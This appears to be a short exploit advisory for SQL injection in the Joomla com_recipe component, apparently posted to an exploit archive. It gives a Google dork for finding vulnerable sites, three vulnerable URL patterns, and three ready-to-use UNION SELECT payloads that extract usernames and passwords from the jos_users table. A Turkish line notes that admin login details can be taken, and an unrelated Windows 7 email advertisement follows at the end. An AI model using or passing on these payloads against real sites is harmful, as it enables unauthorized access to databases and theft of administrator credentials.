The Joomla Recipe component suffers from remote SQL injection vulnerabilities.
c79e24d6537850a4053d04e4085939131483dfa2b615ebb22381d96c8b975d34
########################################################################
#
Joomla Component com_recipe SQL Injection
Vulnerabilities
########################################################################
#
Author :FL0RiX
#
#Greez: All Tahkikat-ul Ahlak Family
#
#
Name : com_recipe
#
# Google Dork: allinurl:"com_recipe"
#
#
Bug Type : SQL Injection
#
#
Infection : Admin login bilgileri alinabilir.
#
#
Demo Vulns :
#
#
site.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]
#
site.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]
#
site.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3]
#
#
EXPLOIT1 :
+and+1=0+union+select+concat(username,0x3a,password)+from+jos_users--
#
EXPLOIT2 :+and+1=0+union+select+1,concat(username,0x3a,password),3,4+from+jos_users--
#
EXPLOIT3 :+and+1=0+union+select+user(),concat(username,0x3a,password),user(),user()+from+jos_users--
#############################################################################
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarý bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop